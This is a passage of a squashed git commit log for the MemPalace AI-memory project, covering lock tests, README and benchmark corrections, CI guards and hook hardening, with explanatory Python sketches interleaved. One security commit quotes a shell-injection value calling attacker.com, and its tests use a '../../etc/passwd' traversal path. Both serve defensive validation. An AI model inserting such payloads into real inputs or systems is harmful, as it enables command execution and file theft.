2. passes on all three OSes without flock-semantics branching;
3. catches real regressions (a broken lock would now let both processes through, exactly what we care about).

Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows.

* test: verify mine_lock via disjoint critical-section intervals

The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn.
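The platform-neutral assertion swap can be sketched with ``pathlib``. The ``state_path`` value here is a hypothetical stand-in for the fixture under test:

```python
from pathlib import Path

# Hypothetical state path standing in for the value under test.
state_path = Path.home() / ".mempalace" / "state" / "diary_state.json"

# Fragile on Windows: separator-dependent substring match.
# assert '/.mempalace/state/' in str(state_path)

# Separator-independent: compare Path objects and components instead.
assert state_path.parent == Path.home() / ".mempalace" / "state"
assert state_path.parent.name == "state"
assert state_path.parent.parent.name == ".mempalace"
```

``Path`` equality compares normalized components, so the same assertion passes whether the OS renders the path with ``/`` or ``\``.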
Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back.

* Fix: ruff format with CI-pinned version (0.4.x)

* fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835)

* fix: README audit — match every claim to shipped code + add hall detection

TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures:

1. Tool count: 19 → 29 (10 tools were undocumented)
2. Added tool table rows for tunnels, drawer management, system tools
3. Version badge: 3.1.0 → 3.2.0
4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers"
5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py)
6. pyproject.toml version in project structure: v3.0.0 → v3.2.0
7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections

New code:

- miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata
- tests/test_hall_detection.py — 12 TDD tests (written before code)
- tests/test_readme_claims.py — 42 TDD tests verifying README accuracy

859/859 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: resolve ruff lint — unused imports and variables

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* style: ruff format with CI-pinned 0.4.x

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: use conftest fixtures in hall tests for Windows compat

Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory.
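The interval-disjointness idea can be sketched in-process with threads and a ``threading.Lock`` standing in for the file lock (a simplification — the real test uses separate processes via spawn):

```python
import threading
import time

lock = threading.Lock()          # stand-in for the real file lock
intervals = []                   # (enter_time, exit_time) per worker

def worker():
    with lock:                   # critical section
        enter = time.monotonic()
        time.sleep(0.05)         # simulate work while holding the lock
        intervals.append((enter, time.monotonic()))

threads = [threading.Thread(target=worker) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# Effect-based assertion: after sorting by enter time, the earlier
# interval must end before the later one begins. No timing thresholds,
# so slow startup can't flake the test.
a, b = sorted(intervals)
assert a[1] <= b[0], "critical sections overlapped — lock is broken"
```

The key property: a working lock makes overlap impossible regardless of scheduling latency, while a broken lock produces overlapping intervals whenever contention actually occurs.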
Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: address Igor's review — convo_miner halls, cached config, markdown typo

TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes.

1. README markdown typo: extra ** in wake-up token row (line 195)
2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it)
3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine
4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching

861/861 tests pass. ruff clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>

* fix(website): update vitepress base url for custom domain

* chore(release): bump version strings to 3.3.0 and curate CHANGELOG

Prepare develop for the 3.3.0 release cycle.

Version bumps:

- mempalace/version.py: 3.2.0 -> 3.3.0
- pyproject.toml: 3.2.0 -> 3.3.0
- README.md: pyproject.toml label and shields.io badge
- uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras)

CHANGELOG.md:

- Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made)
- Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc.
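Keyword-scoring hall detection of the kind described in the README-audit commit can be sketched as below. Everything here is an assumption — the real ``detect_hall()`` in miner.py and the ``hall_keywords`` config schema may look different:

```python
# Hedged sketch of keyword-scoring hall detection; the keyword dict shape,
# the scoring rule, and the "general" fallback are all assumptions.
HALL_KEYWORDS = {
    "engineering": ["code", "bug", "deploy", "test"],
    "personal": ["family", "birthday", "vacation"],
}

def detect_hall(text, hall_keywords=HALL_KEYWORDS, default="general"):
    words = text.lower().split()
    scores = {
        hall: sum(words.count(kw) for kw in kws)
        for hall, kws in hall_keywords.items()
    }
    best = max(scores, key=scores.get)
    # No keyword hits at all → fall back rather than guess a hall.
    return best if scores[best] > 0 else default
```

Caching ``hall_keywords`` at module level (as the follow-up commit does) matters because this runs once per drawer during bulk mining.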
- Adopt Keep a Changelog + SemVer framing
- Add version compare reference links at the bottom
- Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace

---------

Co-authored-by: MSL <[email protected]>
Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>
Co-authored-by: eblander <[email protected]>
Co-authored-by: shafdev <[email protected]>
Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com>
Co-authored-by: mvalentsev <[email protected]>
Co-authored-by: Dominique Deschatre <[email protected]>

* ci: serve docs from develop only

Docs deploy to GitHub Pages from develop for faster iteration cycles. Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway.

Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works.

* fix(status): paginate metadata fetch to support large palaces

`col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850).

Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct.

Tested on a 122,686-drawer palace.

Fixes #850
Related: #802, #723

* refactor: route all chromadb access through ChromaBackend

Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract.
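The paginated scan can be sketched as follows. ``col`` is assumed to expose ChromaDB-style ``count()`` and ``get(limit=..., offset=..., include=[...])``; the aggregation details of the real status command may differ:

```python
from collections import Counter

BATCH = 5000  # batch size from the commit above

def paginated_wing_counts(col):
    """Sketch: offset-paginated metadata scan with incremental aggregation."""
    total = col.count()          # authoritative header count, not len(metas)
    wings = Counter()
    offset = 0
    while offset < total:
        batch = col.get(limit=BATCH, offset=offset, include=["metadatas"])
        metas = batch["metadatas"]
        if not metas:
            break
        for meta in metas:
            wings[meta.get("wing", "?")] += 1
        offset += len(metas)
    return total, wings

class FakeCol:
    """Minimal in-memory stand-in for a ChromaDB collection (demo only)."""
    def __init__(self, metas):
        self._m = metas
    def count(self):
        return len(self._m)
    def get(self, limit, offset, include=None):
        return {"metadatas": self._m[offset:offset + limit]}
```

Bounding each ``get`` at 5k keeps the underlying SQLite query under its bound-variable limit while still walking the full palace.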
Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules.

* fix: update stale org URLs in pyproject.toml and README (#787)

* fix: harden hooks against shell injection, path traversal, and arithmetic injection

save_hook.sh:

- Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files

hooks_cli.py:

- Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files

Tests:

- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809

* fix: add logging on rejected transcript paths and platform-native path test

- _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace/mempalace#809

* Increase visibility of fake website caution

Noticed a URL

```
hXXps://www.mempalace[.]tech/
```

Though the README currently warns, it is perhaps best to surface the caution with more urgency at the top of the README.
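The transcript-path validator's contract can be sketched as below. The function name mirrors the commit text, but the implementation details (separator normalization in particular) are assumptions:

```python
from pathlib import PurePath

# Sketch of the _validate_transcript_path() contract described above;
# the actual hooks_cli implementation may differ in detail.
_ALLOWED_SUFFIXES = {".jsonl", ".json"}

def validate_transcript_path(path: str) -> bool:
    if not path:
        return False
    # Normalize Windows separators so '..' components are visible on any
    # host OS (a simplification of platform-native handling).
    p = PurePath(path.replace("\\", "/"))
    if ".." in p.parts:                   # reject traversal components
        return False
    return p.suffix in _ALLOWED_SUFFIXES  # reject wrong extensions
```

Returning a plain boolean lets the caller fall back to "0 human messages" instead of ever opening an arbitrary file.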
* fix: use permissive validator for KG entity values (closes #455)

sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names.

* chore: bump plugin manifests to 3.3.0 and fix owner URL

Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps.

Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org.

Refs #874

* ci: add version guard to catch tag/manifest drift

Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json).

Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users.

Refs #874

* ci: let semver pre-release tags bypass strict manifest match

Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch.

Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact.

The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves.
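The tag classification from the two CI commits above can be sketched with two regexes. The function and pattern names are assumptions, not the actual workflow code:

```python
import re

# Sketch of the version-guard tag classification described above.
_STABLE = re.compile(r"^v(\d+)\.(\d+)\.(\d+)$")
_PRERELEASE = re.compile(r"^v\d+\.\d+\.\d+-.+$")   # e.g. v3.4.0-rc1

def check_tag(tag: str, manifest_version: str) -> bool:
    """True when the push should pass the guard."""
    if _PRERELEASE.match(tag):
        return True                      # staging builds bypass the match
    m = _STABLE.match(tag)
    if not m:
        return False                     # unrecognized tag shape fails
    return tag[1:] == manifest_version   # stable tags must match exactly
```

This encodes the #874 protection: a stable ``v3.3.0`` tag pointing at a commit whose manifests still say ``3.0.14`` fails fast, while ``v3.4.0-rc1`` sails through.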
* fix: ship CNAME in Pages artifact to pin custom domain

Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source.

Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it.

* docs: tighten SECURITY.md with real version policy and GHPVR-only channel

Builds on @Yorji-Porji's draft by fixing three issues before it lands:

- Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not.
- Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address.
- Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text.

Structure, triage timelines, and credit language are kept as drafted.

* fix: allow mining directories without local mempalace.yaml

When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14.
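The missing-yaml fallback can be sketched as below. The function name and the returned config shape are assumptions about the miner's internals, not the shipped code:

```python
from pathlib import Path

# Hedged sketch of the missing-yaml fallback described above.
def load_source_config(source_dir):
    src = Path(source_dir)
    for name in ("mempalace.yaml", "mempal.yaml"):
        if (src / name).exists():
            # The real loader parses the YAML here; this sketch just
            # records which file it would use.
            return {"config_file": str(src / name)}
    # No local config: default wing to the directory basename instead of
    # sys.exit(1), so any directory can be mined without init.
    return {"wing": src.name, "room": "general"}
```

The follow-up commits route the accompanying warning to stderr and flag that two directories sharing a basename will share a wing under this default.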
* fix: remove unused sys import

* fix: send missing-yaml warning to stderr and flag basename collisions

Addresses review feedback on #604:

- Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml.

* docs: name official domain and specific impostors in scam alert

Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877).

Also update the April 11 follow-up section to match so the two notices no longer contradict each other.

* perf: optimize regex compilation in entity extraction

Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <[email protected]>

* feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)

export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>

* feat: add VSCode devcontainer matching CI environment

Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml.
Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x.

* fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph

* fix: replace invalid 'decision: allow' with {} in hooks

Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: add missing self._lock to KnowledgeGraph.close()

TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* benchmarks: add --llm-backend ollama for non-Anthropic rerank

The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency.
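The lock discipline from the two ``self._lock`` fixes can be sketched as below. The class and attribute names mirror the commit text, but the internals are assumptions about the real KnowledgeGraph:

```python
import sqlite3
import threading

# Hedged sketch of the lock discipline described above for close();
# the shipped KnowledgeGraph differs beyond these two members.
class KnowledgeGraph:
    def __init__(self, db_path=":memory:"):
        self._lock = threading.Lock()
        self._connection = sqlite3.connect(db_path, check_same_thread=False)

    def close(self):
        # Every method touching self._connection holds self._lock —
        # including close() — so a concurrent query can't race teardown.
        with self._lock:
            if self._connection is not None:
                self._connection.close()
                self._connection = None
```

The guard against ``None`` also makes repeated ``close()`` calls harmless.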
Both longmemeval_bench.py and locomo_bench.py:

- llm_rerank*() gain backend= / base_url= kwargs
- CLI: --llm-backend {anthropic,ollama}, --llm-base-url
- API key required only when backend=anthropic (diary/palace modes still require it)
- Parse last integer in response (reasoning models emit multi-int output)
- Fallback to message.reasoning when content is empty
- Raise max_tokens to 1024 for reasoning models

* benchmarks: apply ruff-format to llm_rerank (trivial line wrap)

* benchmarks: add v3.3.0 reproduction results + 50/450 split

Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

    LongMemEval raw R@5                       96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5                98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5            99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10          100.0% (500/500)   *
    LoCoMo (session, top-10) raw              60.3% (1986q)     ✅
    hybrid v5                                 88.9% (1986q)     ✅
    ConvoMem all-categories (250 items)       92.9%             ✅
    MemBench all-categories (8500)            80.3%             ✅

\* The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end.

* docs: slim README and move corrections/notices to docs/HISTORY.md

Addresses #875. The previous README was 755 lines mixing six purposes (scam alert, hero, two mea-culpa notes, install guide, architecture explainer, API reference, file map).
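The "parse last integer" and ``message.reasoning`` fallback bullets can be sketched together. Field names follow the commit text but are assumptions about the benchmark's response handling:

```python
import re
from typing import Optional

# Sketch of the reasoning-model response handling described above.
def parse_rerank_choice(message: dict) -> Optional[int]:
    # Fall back to the reasoning field when content is empty.
    text = message.get("content") or message.get("reasoning") or ""
    ints = re.findall(r"-?\d+", text)
    # Reasoning models emit multi-int output; take the final integer
    # as the answer.
    return int(ints[-1]) if ints else None
```

Taking the last integer tolerates chains of thought that enumerate candidate indices before committing to one.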
Rework it as a pure entry point: what MemPalace is, how to install, honest benchmark numbers, links to the website for concept/architecture documentation.

Key content changes:

- Drop the "highest-scoring AI memory system ever benchmarked" framing.
- New tagline: "Local-first AI memory. Verbatim storage, pluggable backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids naming a specific vector-store implementation since the backend is pluggable (see mempalace/backends/base.py).
- Remove the cross-system comparison table. Retrieval recall (R@5) and end-to-end QA accuracy are different metrics and are not comparable; placing MemPalace's R@5 next to competitor QA accuracy under a single column header was a category error.
- The "100%" LongMemEval headline is no longer the lead. The honest held-out figure is 98.4% R@5 on 450 unseen questions. The rerank pipeline reaches >=99% with any capable LLM (reproduced with Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level, not model-specific.
- Benchmark reproduction commands now reference the correct repo (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch).

New file: docs/HISTORY.md as the canonical home for post-launch corrections, public notices, and retractions. Contains verbatim:

- 2026-04-14 note on this rewrite (links to #875)
- 2026-04-11 impostor-domain notice (moved from README header)
- 2026-04-07 "A Note from Milla & Ben" (moved from README body)

README keeps a one-line scam-alert callout that links to docs/HISTORY.md for the full timeline.

* docs(website): align mempalaceofficial.com with honest benchmarks

Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit.

website/index.md

- New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls).
- Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics).
- Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable.

website/reference/benchmarks.md

- Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific.
- Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval.
- Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions.
- Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag.

website/concepts/the-palace.md

- Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained.

website/guide/searching.md

- Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost.

website/reference/contributing.md

- Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic.
website/concepts/knowledge-graph.md

- Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source.

* docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG

Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits.

CONTRIBUTING.md

- "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents).

benchmarks/BENCHMARKS.md

- Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall.
- Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%.
- Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`.

benchmarks/README.md + benchmarks/HYBRID_MODE.md

- Same clone-URL fix applied.

CHANGELOG.md

- Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite.

* docs+tests: fix CI after README slim (#875)

The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing:

    TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict
    TestNoUnlistedTools.test_no_undocumented_tools
    TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless

Changes in this commit:

1. Update the 3 tests to track the new canonical docs surfaces

   - Tool list -> website/reference/mcp-tools.md (tests parse ``### `mempalace_xxx` `` headings instead of markdown table rows).
   - dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless").

2. Fix the website to make "no undocumented tools" true

   Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools".

3. Align pre-commit ruff pin to match CI (0.4.x)

   .pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step.

Full suite: 887 passed, 0 failed.

* fix: address i18n review issues from PR #718

Three issues flagged by bensig on the i18n PR before merge:

1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}.
2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md.
3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls.

Added two regression tests for the ko.json fix and the state leak.
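The ``from_config`` pitfall in item 3 above comes down to how ``dict.get`` behaves. A minimal sketch (function names are illustrative, not the Dialect API):

```python
# dict.get("lang") returns None when the key is absent, and passing
# lang=None through lets module-level state from an earlier load_lang()
# leak in. An explicit "en" default restores determinism.
def lang_buggy(config):
    return config.get("lang")            # None when absent → inherits prior state

def lang_fixed(config):
    return config.get("lang") or "en"    # deterministic default
```

Note that ``config.get("lang", "en")`` alone would still pass ``None`` through when the key is present with a ``None`` value, which is why the ``or "en"`` form (or an explicit check) is the safer sketch.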
* docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862)

Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first.

* fix: make entity_registry.research() local-only by default (#811)

* fix: make entity_registry.research() local-only by default

research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md.

Changes:

- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling, and cache-not-persisted-on-local-only behaviour

Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks

- Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions

* fix: return empty status instead of error on cold-start palace (#830) (#831)

tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers).
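The local-only contract and the ``.get()``-vs-``.setdefault()`` cache discipline from the two commits above can be sketched together. This is a hedged reconstruction — the real entity_registry differs in detail, and the network lookup here is a placeholder:

```python
# Hedged sketch of the local-only-by-default research() contract.
class EntityRegistry:
    def __init__(self):
        self._data = {}                       # local cache

    def research(self, word, allow_network=False):
        cached = self._data.get(word)         # .get(): read never mutates
        if cached is not None:
            return cached
        if not allow_network:
            return "unknown"                  # local-only default: no lookup,
                                              # and nothing written to cache
        result = self._wikipedia_lookup(word) # opt-in network path
        self._data.setdefault(word, result)   # write to cache only here
        return result

    def _wikipedia_lookup(self, word):
        # Placeholder: the real method queries en.wikipedia.org and returns
        # "unknown" on 404 instead of guessing "person".
        return "unknown"
```

Keeping the cache write on the network path only is what makes the "cache-not-persisted-on-local-only" test pass by construction.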
The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does.

Fix suggested by @hkevinchu in the issue.

* fix(searcher): guard against empty ChromaDB query results (#195) (#865)

Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape:

    {"documents": [], "metadatas": [], "distances": []}

Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response.

Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().

Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard.

Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists.

* fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)

Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report.

This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block.
